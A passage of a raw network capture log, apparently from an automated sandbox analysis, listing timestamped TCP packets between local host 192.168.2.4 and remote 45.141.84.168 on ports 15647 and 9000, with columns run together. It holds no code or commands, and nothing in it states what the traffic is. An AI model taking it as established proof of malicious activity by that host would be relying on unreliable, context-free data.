                                          Nov 28, 2024 13:40:25.763480902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.766711950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.766897917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.773763895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.773849964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.776879072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.776993990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.781790018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.781881094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.790021896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.790113926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.805550098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.805628061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.805687904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.805687904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.805704117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.808073044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.808140039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.812515974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.812652111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.816956043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.817013025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.836998940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.837053061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.838172913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.838227034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.858155966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.858288050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.861898899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.861943007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.871126890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.871140003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.871190071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.884881020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.884926081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.884959936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.886636972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.886703968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.896935940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.897147894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.904145002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.904371977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.915354013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.915643930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.918021917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.918085098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.918087959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.918140888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.927665949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.927700996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.927725077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.932491064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.932543039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.936979055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.937032938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.958195925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.958261967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.972641945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.972691059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.982057095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.982134104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.991152048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.991199017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.999119043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.999198914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.999277115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.011399031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.011528969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.013747931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.013808012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.026381016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.026447058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.026472092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.035600901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.038122892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.038268089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.038321018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.038348913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.052696943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.052757025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.059227943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.059242964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.059283972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.063141108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.063188076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.085901976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.085918903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.085971117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.098298073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.098448992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.108413935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.108454943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.108493090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.116760015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.116810083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.127213001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.127273083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.133753061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.133809090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.138365984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.138411999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.138430119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.158428907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.158493996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.158498049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.178180933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.179219961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.179295063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.179554939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.179620028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.179622889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.179670095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.200081110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.200170994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.208741903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.208836079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.218558073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.218652010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.231163025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.231221914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.231224060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.239360094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.239434004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.253741026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.253824949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.258445978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.258505106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.264419079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.264450073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.264489889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.264519930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.279563904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.279637098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.296691895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.298243999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.298306942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.309511900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.309602022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.325373888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.328983068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.329051018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.333014965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.333076000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.333911896 CET90004982845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.334053993 CET90004982845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.334197044 CET498289000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.334243059 CET498289000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.347673893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.347738028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.347742081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.359489918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.359568119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.364166021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.364260912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.364283085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.378469944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.378655910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.378711939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.378729105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.391500950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.391588926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.407679081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.407785892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.418106079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.418170929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.429636955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.429712057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.438102961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.438208103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.439038038 CET498349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.445395947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.445477962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.453068018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.453133106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.459794044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.459897041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.467237949 CET90004982845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.476156950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.478343964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.478441000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.478480101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.484206915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.484276056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.499500036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.499574900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.513768911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.521554947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.522039890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.540117979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.540191889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.549696922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.549774885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.549865961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.564768076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.565455914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.565490007 CET90004983445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.565587044 CET498349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.565715075 CET498349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.573097944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.575403929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.575525045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.580141068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.580296993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.597436905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.600167990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.600862026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.617294073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.619551897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.619606972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.631059885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.631122112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.631201982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.633888960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.634018898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.644465923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.644572020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.644661903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.659897089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.669866085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.670011044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.670101881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.684916973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.684986115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.685534954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.685549021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.685636044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.685703039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.685717106 CET90004983445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.700390100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.704169035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.706990957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.707063913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.707101107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.707154036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.737359047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.737435102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.739443064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.739502907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.750942945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.752399921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.754132032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.754203081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.766836882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.766906023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.767010927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.774358034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.776365995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.779974937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.780066967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.781193972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.782111883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.795742989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.795759916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.795819044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.818420887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.821254969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.821393013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.821505070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.827991009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.828681946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.835186005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.835275888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.835377932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.859199047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.861218929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.861366034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.861449957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.864069939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.864137888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.876009941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.876565933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.886378050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.888279915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.896872997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.900213003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.903070927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.903150082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.908070087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.908083916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.908164024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.921514988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.921566963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.936119080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.936218023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.936292887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.940079927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.940161943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.948641062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.952228069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.952455044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.952505112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.952519894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.952562094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.966058016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.966175079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.975449085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.975495100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.975609064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.979248047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.981287956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.991556883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.991626024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:26.996470928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:26.996535063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.005424976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.005491018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.005522013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.020278931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.020368099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.025976896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.026055098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.026128054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.029028893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.030575991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.050637960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.060636997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.060651064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.060740948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.061873913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.062060118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.075776100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.078322887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.091078043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.091177940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.091249943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.104630947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.104676008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.104742050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.104758978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.104758978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.119961977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.120086908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.120253086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.120280981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.120342970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.133465052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.133593082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.133713961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.143662930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.145591974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.150466919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.154172897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.156899929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.162180901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.171637058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.172794104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.180588961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.182353973 CET156474973045.141.84.168192.168.2.4
